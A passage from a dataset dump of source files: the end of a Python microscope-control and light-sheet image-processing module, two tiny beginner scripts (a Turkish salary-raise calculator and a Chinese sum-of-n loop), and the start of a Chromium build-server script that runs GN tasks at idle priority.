target=self.ao._write_voltages,\r\n args=(self.voltages,)).start()\r\n check_write_voltages_thread = True\r\n # Finalize hardware commands, fastest to slowest:\r\n if focus_piezo_z_um is not None:\r\n self.focus_piezo._finish_moving()\r\n self.focus_piezo_z_um = self.focus_piezo.z\r\n if filter_wheel_position is not None:\r\n self.filter_wheel._finish_moving()\r\n if XY_stage_position_mm is not None:\r\n self.XY_stage._finish_moving()\r\n self.XY_stage_position_mm = self.XY_stage.x, self.XY_stage.y\r\n if check_write_voltages_thread:\r\n write_voltages_thread.get_result()\r\n self._settings_applied = True\r\n custody.switch_from(self.camera, to=None) # Release camera\r\n settings_thread = ct.CustodyThread(\r\n target=settings_task, first_resource=self.camera).start()\r\n self.unfinished_tasks.put(settings_thread)\r\n return settings_thread\r\n\r\n def snoutfocus(self, filename=None, delay_s=None):\r\n def snoutfocus_task(custody):\r\n custody.switch_from(None, to=self.camera) # Safe to change settings\r\n if delay_s is not None:\r\n start_time = time.perf_counter()\r\n if delay_s > 3: # 3 seconds is def. enough time to focus\r\n time.sleep(delay_s - 3)\r\n if not self._settings_applied:\r\n print(\"\\n%s: ***WARNING*** -> settings not applied\"%self.name)\r\n print(\"%s: -> please apply legal settings\"%self.name)\r\n print(\"%s: (all arguments must be specified at least once)\")\r\n custody.switch_from(self.camera, to=None)\r\n return\r\n self._settings_applied = False # In case the thread crashes\r\n # Record the settings we'll have to reset:\r\n old_fw_pos = self.filter_wheel_position\r\n old_images = self.camera.num_images\r\n old_exp_us = self.camera.exposure_us\r\n old_roi_px = self.camera.roi_px\r\n old_timestamp = self.camera.timestamp_mode\r\n old_voltages = self.voltages\r\n # Get microscope settings ready to take our measurement:\r\n self.filter_wheel.move(1, speed=6, block=False) # Empty slot\r\n self.snoutfocus_controller.set_voltage(0, block=False) # fw slower\r\n piezo_limit_v = 75 # 20 um for current piezo\r\n piezo_step_v = 1 # 267 nm steps\r\n piezo_voltages = np.arange(\r\n 0, piezo_limit_v + piezo_step_v, piezo_step_v)\r\n images = len(piezo_voltages)\r\n self.camera.num_images = images # update attribute\r\n roi_px = {'left': 901, 'right': 1160, 'top': 901, 'bottom': 1148}\r\n self.camera._disarm()\r\n self.camera._set_roi(roi_px)\r\n self.camera._set_exposure_time_us(100)\r\n self.camera._set_timestamp_mode('off')\r\n self.camera._arm(self.camera._num_buffers)\r\n # Calculate voltages for the analog-out card:\r\n exp_px = self.ao.s2p(1e-6*self.camera.exposure_us)\r\n roll_px = self.ao.s2p(1e-6*self.camera.rolling_time_us)\r\n jitter_px = max(self.ao.s2p(30e-6), 1)\r\n piezo_settling_px = self.ao.s2p(0.000) # Not yet measured\r\n period_px = (max(exp_px, roll_px, piezo_settling_px) + jitter_px)\r\n n2c = self.names_to_voltage_channels # A temporary nickname\r\n v_open_shutter = np.zeros((self.ao.s2p(5*1e-3), # Shutter open time\r\n self.ao.num_channels), 'float64')\r\n v_open_shutter[:, n2c['snoutfocus_shutter']] = 5\r\n voltages = [v_open_shutter] # insert the shutter open array first\r\n for piezo_voltage in piezo_voltages:\r\n v = np.zeros((period_px, self.ao.num_channels), 'float64')\r\n v[:, n2c['snoutfocus_shutter']] = 5\r\n v[:roll_px, n2c['camera']] = 5\r\n v[:, n2c['snoutfocus_piezo']] = (\r\n 10 * (piezo_voltage / piezo_limit_v)) # 10 V\r\n voltages.append(v)\r\n voltages = np.concatenate(voltages, axis=0)\r\n # Allocate memory and finalize microscope settings:\r\n data_buffer = self._get_data_buffer(\r\n (images, self.camera.height_px, self.camera.width_px), 'uint16')\r\n self.snoutfocus_controller._finish_set_voltage(polling_wait_s=0)\r\n self.filter_wheel._finish_moving()\r\n # Take pictures while moving the snoutfocus piezo:\r\n camera_thread = ct.ResultThread(\r\n target=self.camera.record_to_memory,\r\n kwargs={'allocated_memory': data_buffer,\r\n 'software_trigger': False},).start()\r\n self.ao.play_voltages(voltages, block=False) # Ends at 0 V\r\n camera_thread.get_result()\r\n # Start cleaning up after ourselves:\r\n write_voltages_thread = ct.ResultThread(\r\n target=self.ao._write_voltages,\r\n args=(old_voltages,)).start()\r\n self.filter_wheel.move(old_fw_pos, speed=6, block=False)\r\n # Inspect the images to find/set best snoutfocus piezo position:\r\n if np.max(data_buffer) < 5 * np.min(data_buffer):\r\n print('\\n%s: WARNING snoutfocus laser intensity low:'%self.name)\r\n print('%s: -> is the laser/shutter powered up?'%self.name)\r\n v = piezo_step_v * np.unravel_index(\r\n np.argmax(data_buffer), data_buffer.shape)[0]\r\n if (v == 0 or v == piezo_limit_v):\r\n print('\\n%s: WARNING snoutfocus piezo out of range!'%self.name)\r\n self.snoutfocus_controller.set_voltage(v, block=False)\r\n if self.verbose:\r\n print('\\n%s: snoutfocus piezo voltage = %0.2f'%(self.name, v))\r\n # Finish cleaning up after ourselves:\r\n self.camera.num_images = old_images\r\n self.camera._disarm()\r\n self.camera._set_roi(old_roi_px)\r\n self.camera._set_exposure_time_us(old_exp_us)\r\n self.camera._set_timestamp_mode(old_timestamp)\r\n self.camera._arm(self.camera._num_buffers)\r\n self.snoutfocus_controller._finish_set_voltage(polling_wait_s=0)\r\n self.filter_wheel._finish_moving()\r\n write_voltages_thread.get_result()\r\n self._settings_applied = True\r\n # We might want to hold camera custody for a fixed amount of time:\r\n if delay_s is not None:\r\n while time.perf_counter() - start_time < delay_s:\r\n time.sleep(0.001)\r\n custody.switch_from(self.camera, to=None)\r\n if filename is not None:\r\n if not os.path.exists('sols_snoutfocus'):\r\n os.makedirs('sols_snoutfocus')\r\n path = 'sols_snoutfocus\\\\' + filename\r\n if self.verbose:\r\n print(\"%s: saving '%s'\"%(self.name, path))\r\n imwrite(path, data_buffer[:, np.newaxis, :, :], imagej=True)\r\n if self.verbose: print(\"%s: done saving.\"%self.name)\r\n self._release_data_buffer(data_buffer)\r\n snoutfocus_thread = ct.CustodyThread(\r\n target=snoutfocus_task, first_resource=self.camera).start()\r\n self.unfinished_tasks.put(snoutfocus_thread)\r\n return snoutfocus_thread\r\n\r\n def acquire(self, # 'tzcyx' format\r\n filename=None, # None = no save, same string = overwrite\r\n folder_name=None, # None = new folder, same string = re-use\r\n description=None, # Optional metadata description\r\n delay_s=None, # Optional time delay baked in + Snoutfocus\r\n display=True): # Optional turn off\r\n delay_during_acquire = True # default apply delay_s during acquire task\r\n if delay_s is not None and delay_s > 3:\r\n self.snoutfocus(delay_s=delay_s) # Run snoutfocus for longer delays\r\n delay_during_acquire = False # snoutfocus will apply the delay_s\r\n def acquire_task(custody):\r\n custody.switch_from(None, to=self.camera) # get camera\r\n if not self._settings_applied:\r\n print(\"\\n%s: ***WARNING*** -> settings not applied\"%self.name)\r\n print(\"%s: -> please apply legal settings\"%self.name)\r\n print(\"%s: (all arguments must be specified at least once)\")\r\n custody.switch_from(self.camera, to=None)\r\n return\r\n if delay_during_acquire and delay_s is not None:\r\n time.sleep(delay_s) # simple but not 'us' precise\r\n if filename is not None:\r\n prepare_to_save_thread = ct.ResultThread(\r\n target=self._prepare_to_save,\r\n args=(filename, folder_name, description, delay_s)).start()\r\n # We have custody of the camera so attribute access is safe:\r\n vo = self.volumes_per_buffer\r\n sl = self.slices_per_volume\r\n ch = len(self.channels_per_slice)\r\n h_px = self.height_px\r\n w_px = self.width_px\r\n s_px = self.scan_step_size_px\r\n l_px = self.preview_line_px\r\n c_px = self.preview_crop_px\r\n ts = self.timestamp_mode\r\n im = self.images\r\n data_buffer = self._get_data_buffer((im, h_px, w_px), 'uint16')\r\n # camera.record_to_memory() blocks, so we use a thread:\r\n camera_thread = ct.ResultThread(\r\n target=self.camera.record_to_memory,\r\n kwargs={'allocated_memory': data_buffer,\r\n 'software_trigger': False},).start()\r\n # Race condition: the camera starts with (typically 16) single\r\n # frame buffers, which are filled by triggers from\r\n # ao.play_voltages(). The camera_thread empties them, hopefully\r\n # fast enough that we never run out. So far, the camera_thread\r\n # seems to both start on time, and keep up reliably once it starts,\r\n # but this could be fragile. The camera thread (effectively)\r\n # acquires shared memory as it writes to the allocated buffer.\r\n # On this machine the memory acquisition is faster than the camera\r\n # (~4GB/s vs ~1GB/s) but this could also be fragile if another\r\n # process interferes.\r\n self.ao.play_voltages(block=False)\r\n camera_thread.get_result()\r\n custody.switch_from(self.camera, to=self.datapreview)\r\n # Acquisition is 3D, but display and filesaving are 5D:\r\n data_buffer = data_buffer.reshape(vo, sl, ch, h_px, w_px)\r\n preview_shape = DataPreview.shape(\r\n vo, sl, ch, h_px, w_px, s_px, l_px, c_px, ts)\r\n preview_buffer = self._get_preview_buffer(preview_shape, 'uint16')\r\n self.datapreview.get(data_buffer, s_px, l_px, c_px, ts,\r\n allocated_memory=preview_buffer)\r\n if display:\r\n custody.switch_from(self.datapreview, to=self.display)\r\n self.display.show_image(preview_buffer)\r\n custody.switch_from(self.display, to=None)\r\n else:\r\n custody.switch_from(self.datapreview, to=None)\r\n if filename is not None:\r\n data_path, preview_path = prepare_to_save_thread.get_result()\r\n if self.verbose:\r\n print(\"%s: saving '%s'\"%(self.name, data_path))\r\n print(\"%s: saving '%s'\"%(self.name, preview_path))\r\n # TODO: consider puting FileSaving in a SubProcess\r\n imwrite(data_path, data_buffer, imagej=True)\r\n imwrite(preview_path, preview_buffer, imagej=True)\r\n if self.verbose:\r\n print(\"%s: done saving.\"%self.name)\r\n self._release_data_buffer(data_buffer)\r\n self._release_preview_buffer(preview_buffer)\r\n del preview_buffer\r\n acquire_thread = ct.CustodyThread(\r\n target=acquire_task, first_resource=self.camera).start()\r\n self.unfinished_tasks.put(acquire_thread)\r\n return acquire_thread\r\n\r\n def finish_all_tasks(self):\r\n collected_tasks = []\r\n while True:\r\n try:\r\n th = self.unfinished_tasks.get_nowait()\r\n except queue.Empty:\r\n break\r\n th.get_result()\r\n collected_tasks.append(th)\r\n return collected_tasks\r\n\r\n def close(self):\r\n if self.verbose: print(\"%s: closing...\"%self.name)\r\n self.finish_all_tasks()\r\n self.ao.close()\r\n self.filter_wheel.close()\r\n self.camera.close()\r\n self.snoutfocus_controller.close()\r\n self.focus_piezo.close()\r\n self.XY_stage.close()\r\n self.display.close()\r\n if self.verbose: print(\"%s: done closing.\"%self.name)\r\n\r\n# SOLS definitions and API:\r\n\r\n# The chosen API (exposed via '.apply_settings()') forces the user to\r\n# select scan settings (via 'voxel_aspect_ratio' and 'scan_range_um') that are\r\n# then legalized to give integer pixel shears when converting the raw data to\r\n# the 'native' view data. This speeds up data processing and gives a natural or\r\n# 'native' view of the data ***without interpolation***. If necessary an expert\r\n# user can bypass these legalizers by directly setting the 'scan_step_size_px'\r\n# and 'scan_range_um' attributes after the last call to '.apply_settings()'.\r\n\r\ndef calculate_scan_step_size_um(scan_step_size_px):\r\n return scan_step_size_px * sample_px_um / np.cos(tilt)\r\n\r\ndef calculate_scan_range_um(scan_step_size_px, slices_per_volume):\r\n scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n return scan_step_size_um * (slices_per_volume - 1)\r\n\r\ndef calculate_voxel_aspect_ratio(scan_step_size_px):\r\n return scan_step_size_px * np.tan(tilt)\r\n\r\ndef calculate_cuboid_voxel_scan(voxel_aspect_ratio, scan_range_um):\r\n scan_step_size_px = max(int(round(voxel_aspect_ratio / np.tan(tilt))), 1)\r\n scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n slices_per_volume = 1 + int(round(scan_range_um / scan_step_size_um))\r\n return scan_step_size_px, slices_per_volume # watch out for fencepost!\r\n\r\nclass DataPreview:\r\n # Returns 3 max intensity projections along the traditional XYZ axes. For\r\n # speed (and simplicity) these are calculated to the nearest pixel (without\r\n # interpolation) and should propably not be used for rigorous analysis.\r\n @staticmethod\r\n def shape(volumes_per_buffer,\r\n slices_per_volume,\r\n num_channels_per_slice, # = len(channels_per_slice)\r\n height_px,\r\n width_px,\r\n scan_step_size_px,\r\n preview_line_px,\r\n preview_crop_px,\r\n timestamp_mode):\r\n # Calculate max pixel shear:\r\n scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n prop_px_per_scan_step = scan_step_size_um / ( # for an O1 axis view\r\n sample_px_um * np.cos(tilt))\r\n prop_px_shear_max = int(np.rint(\r\n prop_px_per_scan_step * (slices_per_volume - 1)))\r\n # Get image size with projections:\r\n t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n h_px = height_px - t_px - b_px\r\n x_px = width_px\r\n y_px = int(round((h_px + prop_px_shear_max) * np.cos(tilt)))\r\n z_px = int(round(h_px * np.sin(tilt)))\r\n shape = (volumes_per_buffer,\r\n num_channels_per_slice,\r\n y_px + z_px + 2 * preview_line_px,\r\n x_px + z_px + 2 * preview_line_px)\r\n return shape\r\n\r\n def get(self,\r\n data, # raw 5D data, 'tzcyx' input -> 'tcyx' output\r\n scan_step_size_px,\r\n preview_line_px,\r\n preview_crop_px,\r\n timestamp_mode,\r\n allocated_memory=None):\r\n vo, slices, ch, h_px, w_px = data.shape\r\n s_px, l_px, c_px = scan_step_size_px, preview_line_px, preview_crop_px\r\n # Get preview shape and check allocated memory (or make new array):\r\n preview_shape = self.shape(\r\n vo, slices, ch, h_px, w_px, s_px, l_px, c_px, timestamp_mode)\r\n if allocated_memory is not None:\r\n assert allocated_memory.shape == preview_shape\r\n return_value = None # use given memory and avoid return\r\n else: # make new array and return\r\n allocated_memory = np.zeros(preview_shape, 'uint16')\r\n return_value = allocated_memory\r\n t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n prop_px = h_px - t_px - b_px # i.e. prop_px = h_px (with cropping)\r\n data = data[:, :, :, t_px:h_px - b_px, :]\r\n scan_step_size_um = calculate_scan_step_size_um(scan_step_size_px)\r\n # Calculate max px shear on the propagation axis for an 'O1' projection:\r\n # -> more shear than for a 'native' projection\r\n prop_px_per_scan_step = scan_step_size_um / ( # O1 axis view\r\n sample_px_um * np.cos(tilt))\r\n prop_px_shear_max = int(np.rint(prop_px_per_scan_step * (slices - 1)))\r\n # Calculate max px shear on the scan axis for a 'width' projection:\r\n scan_steps_per_prop_px = 1 / prop_px_per_scan_step # width axis view\r\n scan_px_shear_max = int(np.rint(scan_steps_per_prop_px * (prop_px - 1)))\r\n # Make projections:\r\n for v in range(vo):\r\n for c in range(ch):\r\n O1_proj = np.zeros(\r\n (prop_px + prop_px_shear_max, w_px), 'uint16')\r\n width_proj = np.zeros(\r\n (slices + scan_px_shear_max, prop_px), 'uint16')\r\n max_width = np.amax(data[v, :, c, :, :], axis=2)\r\n scan_proj = np.amax(data[v, :, c, :, :], axis=0)\r\n for i in range(slices):\r\n prop_px_shear = int(np.rint(i * prop_px_per_scan_step))\r\n target = O1_proj[prop_px_shear:prop_px + prop_px_shear, :]\r\n np.maximum(target, data[v, i, c, :, :], out=target)\r\n for i in range(prop_px):\r\n scan_px_shear = int(np.rint(i * scan_steps_per_prop_px))\r\n width_proj[scan_px_shear:slices + scan_px_shear, i] = (\r\n max_width[:, i])\r\n # Scale images according to pixel size (divide by X_px_um):\r\n X_px_um = sample_px_um # width axis\r\n Y_px_um = sample_px_um * np.cos(tilt) # prop. axis to scan axis\r\n Z_px_um = sample_px_um * np.sin(tilt) # prop. axis to O1 axis\r\n O1_img = zoom(O1_proj, (Y_px_um / X_px_um, 1))\r\n scan_img = zoom(scan_proj, (Z_px_um / X_px_um, 1))\r\n scan_scale = O1_img.shape[0] / width_proj.shape[0]\r\n # = scan_step_size_um / X_px_um rounded to match O1_img.shape[0]\r\n width_img = zoom(width_proj, (scan_scale, Z_px_um / X_px_um))\r\n # Make image with all projections and flip for traditional view:\r\n y_px, x_px = O1_img.shape\r\n line_min, line_max = O1_img.min(), O1_img.max()\r\n # Pass projections into allocated memory:\r\n m = allocated_memory # keep code short!\r\n m[v, c, l_px:y_px + l_px, l_px:x_px + l_px] = O1_img\r\n## m[v, c, y_px + 2*l_px:, l_px:x_px + l_px] = np.flipud(scan_img)\r\n m[v, c, y_px + 2*l_px:, l_px:x_px + l_px] = scan_img\r\n## m[v, c, l_px:y_px + l_px, x_px + 2*l_px:] = np.fliplr(width_img)\r\n m[v, c, l_px:y_px + l_px, x_px + 2*l_px:] = width_img\r\n m[v, c, y_px + 2*l_px:, x_px + 2*l_px:] = np.full(\r\n (scan_img.shape[0], width_img.shape[1]), 0)\r\n # Add line separations between projections:\r\n m[v, c, :l_px, :] = line_max\r\n m[v, c, :l_px, ::10] = line_min\r\n m[v, c, y_px + l_px:y_px + 2*l_px, :] = line_max\r\n m[v, c, y_px + l_px:y_px + 2*l_px, ::10] = line_min\r\n m[v, c, :, :l_px] = line_max\r\n m[v, c, ::10, :l_px] = line_min\r\n m[v, c, :, x_px + l_px:x_px + 2*l_px] = line_max\r\n m[v, c, ::10, x_px + l_px:x_px + 2*l_px] = line_min\r\n m[v, c, :] = np.flipud(m[v, c, :])\r\n return return_value\r\n\r\nclass DataZ:\r\n # Can be used to estimate the z location of the sample in um relative to\r\n # the lowest pixel (useful for software autofocus for example). Choose:\r\n # - 'max_intensity' to track the brightest z pixel\r\n # - 'max_gradient' as a proxy for the coverslip boundary\r\n def estimate(\r\n self,\r\n preview_image, # 2D preview image: single volume, single channel\r\n height_px,\r\n width_px, \r\n preview_line_px,\r\n preview_crop_px,\r\n timestamp_mode,\r\n method='max_gradient',\r\n gaussian_filter_std=3,\r\n ):\r\n assert method in ('max_intensity', 'max_gradient')\r\n t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n h_px = height_px - t_px - b_px\r\n z_px = int(round(h_px * np.sin(tilt))) # DataPreview definition\r\n inspect_me = preview_image[:z_px, preview_line_px:width_px]\r\n intensity_line = np.average(inspect_me, axis=1)[::-1] # O1 -> coverslip\r\n intensity_line_smooth = gaussian_filter1d(\r\n intensity_line, gaussian_filter_std) # reject hot pixels \r\n if method == 'max_intensity':\r\n max_z_intensity_um = np.argmax(intensity_line_smooth) * sample_px_um\r\n return max_z_intensity_um\r\n intensity_gradient = np.zeros((len(intensity_line_smooth) - 1))\r\n for px in range(len(intensity_line_smooth) - 1):\r\n intensity_gradient[px] = (\r\n intensity_line_smooth[px + 1] - intensity_line_smooth[px])\r\n max_z_gradient_um = np.argmax(intensity_gradient) * sample_px_um\r\n return max_z_gradient_um\r\n\r\nclass DataRoi:\r\n # Can be used for cropping empty pixels from raw data. The SOLS microscope\r\n # produces vast amounts of data very quickly, often with many empty\r\n # pixels (so discarding them can help). This simple routine assumes a\r\n # central sample/roi and then attemps to reject the surrounding empty pixels\r\n # accroding to the 'signal_to_bg_ratio' (threshold method).\r\n def get(\r\n self,\r\n data, # raw 5D data, 'tzcyx' input -> 'tzcyx' output\r\n preview_crop_px,\r\n timestamp_mode,\r\n signal_to_bg_ratio=1.2, # adjust for threshold\r\n gaussian_filter_std=3, # adjust for smoothing/hot pixel rejection\r\n ):\r\n vo, slices, ch, h_px, w_px = data.shape\r\n t_px, b_px = 2 * (preview_crop_px,) # crop top and bottom pixel rows\r\n if timestamp_mode == \"binary+ASCII\": t_px = 8 # ignore timestamps\r\n min_index_vo, max_index_vo = [], []\r\n for v in range(vo):\r\n min_index_ch, max_index_ch = [], []\r\n for c in range(ch):\r\n # Max project volume to images:\r\n width_projection = np.amax(\r\n data[v, :, c, t_px:h_px - b_px, :], axis=2)\r\n scan_projection = np.amax(\r\n data[v, :, c, t_px:h_px - b_px, :], axis=0)\r\n # Max project images to lines and smooth to reject hot pixels:\r\n scan_line = gaussian_filter1d(\r\n np.max(width_projection, axis=1), gaussian_filter_std)\r\n prop_line = gaussian_filter1d(\r\n np.max(scan_projection, axis=1), gaussian_filter_std)\r\n width_line = gaussian_filter1d(\r\n np.max(scan_projection, axis=0), gaussian_filter_std)\r\n # Find background level and set threshold:\r\n scan_threshold = int(min(scan_line) * signal_to_bg_ratio)\r\n prop_threshold = int(min(prop_line) * signal_to_bg_ratio)\r\n width_threshold = int(min(width_line) * signal_to_bg_ratio)\r\n # Estimate roi:.\r\n min_index_zyx = [0, 0, 0]\r\n max_index_zyx = [slices - 1, h_px - 1, w_px - 1]\r\n for i in range(slices):\r\n if scan_line[i] > scan_threshold:\r\n min_index_zyx[0] = i\r\n break\r\n for i in range(h_px - t_px - b_px):\r\n if prop_line[i] > prop_threshold:\r\n min_index_zyx[1] = i + t_px # put cropped pixels back\r\n break\r\n for i in range(w_px):\r\n if width_line[i] > width_threshold:\r\n min_index_zyx[2] = i\r\n break \r\n for i in range(slices):\r\n if scan_line[-i] > scan_threshold:\r\n max_index_zyx[0] = max_index_zyx[0] - i\r\n break\r\n for i in range(h_px - t_px - b_px):\r\n if prop_line[-i] > prop_threshold:\r\n max_index_zyx[1] = max_index_zyx[1] - i - b_px\r\n break\r\n for i in range(w_px):\r\n if width_line[-i] > width_threshold:\r\n max_index_zyx[2] = max_index_zyx[2] - i\r\n break\r\n min_index_ch.append(min_index_zyx)\r\n max_index_ch.append(max_index_zyx)\r\n min_index_vo.append(np.amin(min_index_ch, axis=0))\r\n max_index_vo.append(np.amax(max_index_ch, axis=0))\r\n min_i = np.amin(min_index_vo, axis=0)\r\n max_i = np.amax(max_index_vo, axis=0)\r\n data_roi = data[\r\n :, min_i[0]:max_i[0], :, min_i[1]:max_i[1], min_i[2]:max_i[2]]\r\n return data_roi # hopefully smaller!\r\n\r\nclass DataNative:\r\n # The 'native view' is the most principled view of the data for analysis.\r\n # If 'type(scan_step_size_px) is int' (default) then no interpolation is\r\n # needed to view the volume. The native view looks at the sample with\r\n # the 'tilt' of the Snouty objective (microsope 3 in the emmission path).\r\n def get(\r\n self,\r\n data, # raw 5D data, 'tzcyx' input -> 'tzcyx' output\r\n scan_step_size_px):\r\n vo, slices, ch, h_px, w_px = data.shape\r\n prop_px = h_px # light-sheet propagation axis\r\n scan_step_px_max = int(np.rint(scan_step_size_px * (slices - 1)))\r\n data_native = np.zeros(\r\n (vo, slices, ch, prop_px + scan_step_px_max, w_px), 'uint16')\r\n for v in range(vo):\r\n for c in range(ch):\r\n for i in range(slices):\r\n prop_px_shear = int(np.rint(i * scan_step_size_px))\r\n data_native[\r\n v, i, c, prop_px_shear:prop_px + prop_px_shear, :] = (\r\n data[v, i, c, :, :])\r\n return data_native # larger!\r\n\r\nclass DataTraditional:\r\n # Very slow but pleasing - rotates the native view to the traditional view!\r\n def get(\r\n self,\r\n data_native, # raw 5D data, 'tzcyx' input -> 'tzcyx' output\r\n scan_step_size_px):\r\n vo, slices, ch, h_px, w_px = data_native.shape\r\n voxel_aspect_ratio = calculate_voxel_aspect_ratio(scan_step_size_px)\r\n tzcyx = []\r\n for v in range(vo):\r\n zcyx = []\r\n for c in range(ch):\r\n zyx_native_cubic_voxels = zoom(\r\n data_native[v, :, c, :, :], (voxel_aspect_ratio, 1, 1))\r\n zyx_traditional = rotate(\r\n zyx_native_cubic_voxels, np.rad2deg(tilt))\r\n zcyx.append(zyx_traditional[:, np.newaxis, : ,:])\r\n zcyx = np.concatenate(zcyx, axis=1)\r\n tzcyx.append(zcyx[np.newaxis, :, :, : ,:])\r\n data_traditional = np.concatenate(tzcyx, axis=0)\r\n return data_traditional # even larger!\r\n\r\nif __name__ == '__main__':\r\n t0 = time.perf_counter()\r\n\r\n # Create scope object:\r\n scope = Microscope(max_allocated_bytes=100e9, ao_rate=1e4)\r\n scope.apply_settings( # Mandatory call\r\n channels_per_slice=(\"LED\", \"488\"),\r\n power_per_channel=(50, 10),\r\n filter_wheel_position=3,\r\n illumination_time_us=100,\r\n height_px=248,\r\n width_px=1060,\r\n voxel_aspect_ratio=2,\r\n scan_range_um=50,\r\n volumes_per_buffer=1,\r\n focus_piezo_z_um=(0,'relative'),\r\n XY_stage_position_mm=(0,0,'relative'),\r\n ).join()\r\n\r\n # Run snoutfocus and acquire:\r\n folder_label = 'sols_test_data'\r\n dt = datetime.strftime(datetime.now(),'%Y-%m-%d_%H-%M-%S_000_')\r\n folder_name = dt + folder_label\r\n scope.snoutfocus(filename='snoutfocus.tif')\r\n for i in range(3):\r\n scope.acquire(\r\n filename='%06i.tif'%i,\r\n folder_name=folder_name,\r\n description='something...',\r\n delay_s=0,\r\n display=True,\r\n )\r\n scope.close()\r\n\r\n t1 = time.perf_counter()\r\n print('time_s', t1 - t0) # ~ 9.5s\r\n","sub_path":"figures/data/air_objective/beads/ht_sols_microscope.py","file_name":"ht_sols_microscope.py","file_ext":"py","file_size_in_byte":50696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348093151","text":"#Maaşı ve zam oranı girilen işçinin zamlı maaşını hesaplayarak ekranda gösteren Python örneği:\r\n\r\n\r\ndef hesap(maas,zam):\r\n yenimaas=(maas+(maas*(zam/100)))\r\n print(\"Yeni Zamlı Maaş:\",yenimaas)\r\n\r\nmaas=int(input(\"Normal Maaşınızı Giriniz..\"))\r\nzam=int(input(\"Zam Oranını Giriniz...\"))\r\nhesap(maas,zam)\r\n\r\n\r\n#\r\n","sub_path":"zamlımaas.py","file_name":"zamlımaas.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"462652864","text":"#!/usr/bin/python\n#coding:utf-8\nimport sys\nprint(\"输入一个自然数,我将求它的前n项和\")\nn=input(\"N=\")\ni=1\ns=0\nwhile i<=n:\n s+=i\n i+=1\nprint(\"1+2+...+\"+str(n)+\"=\"+str(s))\n","sub_path":"For/For.py","file_name":"For.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"251230172","text":"#!/usr/bin/env python3\n# Copyright 2021 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\"\"\"Creates an server to offload non-critical-path GN targets.\"\"\"\n\nimport argparse\nimport dataclasses\nimport json\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport sys\nimport threading\nfrom typing import Dict, List, Optional, Tuple\n\nsys.path.append(os.path.join(os.path.dirname(__file__), 'gyp'))\nfrom util import server_utils\n\n\nclass Logger:\n \"\"\"Class to store global state for logging.\"\"\"\n num_processes: int = 0\n completed_tasks: int = 0\n total_tasks: int = 0\n\n @classmethod\n def _plural(cls, word: str, num: int, suffix: str = 's'):\n if num == 1:\n return word\n return word + suffix\n\n @classmethod\n def _prefix(cls):\n # Ninja's prefix is: [205 processes, 6/734 @ 6.5/s : 0.922s ]\n # Time taken and task completion rate are not important for the build server\n # since it is always running in the background and uses idle priority for\n # its tasks.\n processes_str = cls._plural('process', cls.num_processes, suffix='es')\n return (f'{cls.num_processes} {processes_str}, '\n f'{cls.completed_tasks}/{cls.total_tasks}')\n\n @classmethod\n def log(cls, msg: str, *, end: str = ''):\n # Shrink the message (leaving a 2-char prefix and use the rest of the room\n # for the suffix) according to terminal size so it is always one line.\n width = shutil.get_terminal_size().columns\n prefix = f'[{cls._prefix()}] '\n max_msg_width = width - len(prefix)\n if len(msg) > max_msg_width:\n length_to_show = max_msg_width - 5 # Account for ellipsis and header.\n msg = f'{msg[:2]}...{msg[-length_to_show:]}'\n # \\r to return the carriage to the beginning of line.\n # \\033[K to replace the normal \\n to erase until the end of the line.\n # Avoid the default line ending so the next \\r overwrites the same line just\n # like ninja's output.\n print(f'\\r{prefix}{msg}\\033[K', end=end, flush=True)\n\n\n@dataclasses.dataclass\nclass Task:\n \"\"\"Class to represent a single build task.\"\"\"\n name: str\n cwd: str\n cmd: List[str]\n stamp_file: str\n _proc: Optional[subprocess.Popen] = None\n _thread: Optional[threading.Thread] = None\n _terminated: bool = False\n _return_code: Optional[int] = None\n\n @property\n def key(self):\n return (self.cwd, self.name)\n\n def start(self):\n assert self._proc is None\n Logger.num_processes += 1\n Logger.log(f'STARTING {self.name}')\n # The environment variable forces the script to actually run in order to\n # avoid infinite recursion.\n env = os.environ.copy()\n env[server_utils.BUILD_SERVER_ENV_VARIABLE] = '1'\n # Use os.nice(19) to ensure the lowest priority (idle) for these analysis\n # tasks since we want to avoid slowing down the actual build.\n # TODO(wnwen): Also use ionice to reduce resource consumption. Possibly use\n # cgroups to make these processes use even fewer resources than\n # idle priority.\n self._proc = subprocess.Popen(\n self.cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=self.cwd,\n env=env,\n text=True,\n preexec_fn=lambda: os.nice(19),\n )\n # Avoid daemon=True to allow threads to finish running cleanup on Ctrl-C.\n self._thread = threading.Thread(target=self._complete_when_process_finishes)\n self._thread.start()\n\n def terminate(self):\n if self._terminated:\n return\n self._terminated = True\n if self._proc:\n self._proc.terminate()\n self._proc.wait()\n if self._thread:\n self._thread.join()\n\n def _complete_when_process_finishes(self):\n assert self._proc\n # We know Popen.communicate will return a str and not a byte since it is\n # constructed with text=True.\n stdout: str = self._proc.communicate()[0]\n self._return_code = self._proc.returncode\n self._proc = None\n self._complete(stdout)\n\n def _complete(self, stdout: str):\n assert self._proc is None\n Logger.completed_tasks += 1\n Logger.num_processes -= 1\n failed = False\n if self._terminated:\n Logger.log(f'TERMINATED {self.name}')\n # Ignore stdout as it is now outdated.\n failed = True\n else:\n Logger.log(f'FINISHED {self.name}')\n if stdout or self._return_code != 0:\n failed = True\n # An extra new line is needed since _log does not end with a new line.\n print(f'\\nFAILED: {self.name} Return code: {self._return_code}')\n print(' '.join(self.cmd))\n print(stdout)\n\n if failed:\n # Force ninja to consider failed targets as dirty.\n try:\n os.unlink(os.path.join(self.cwd, 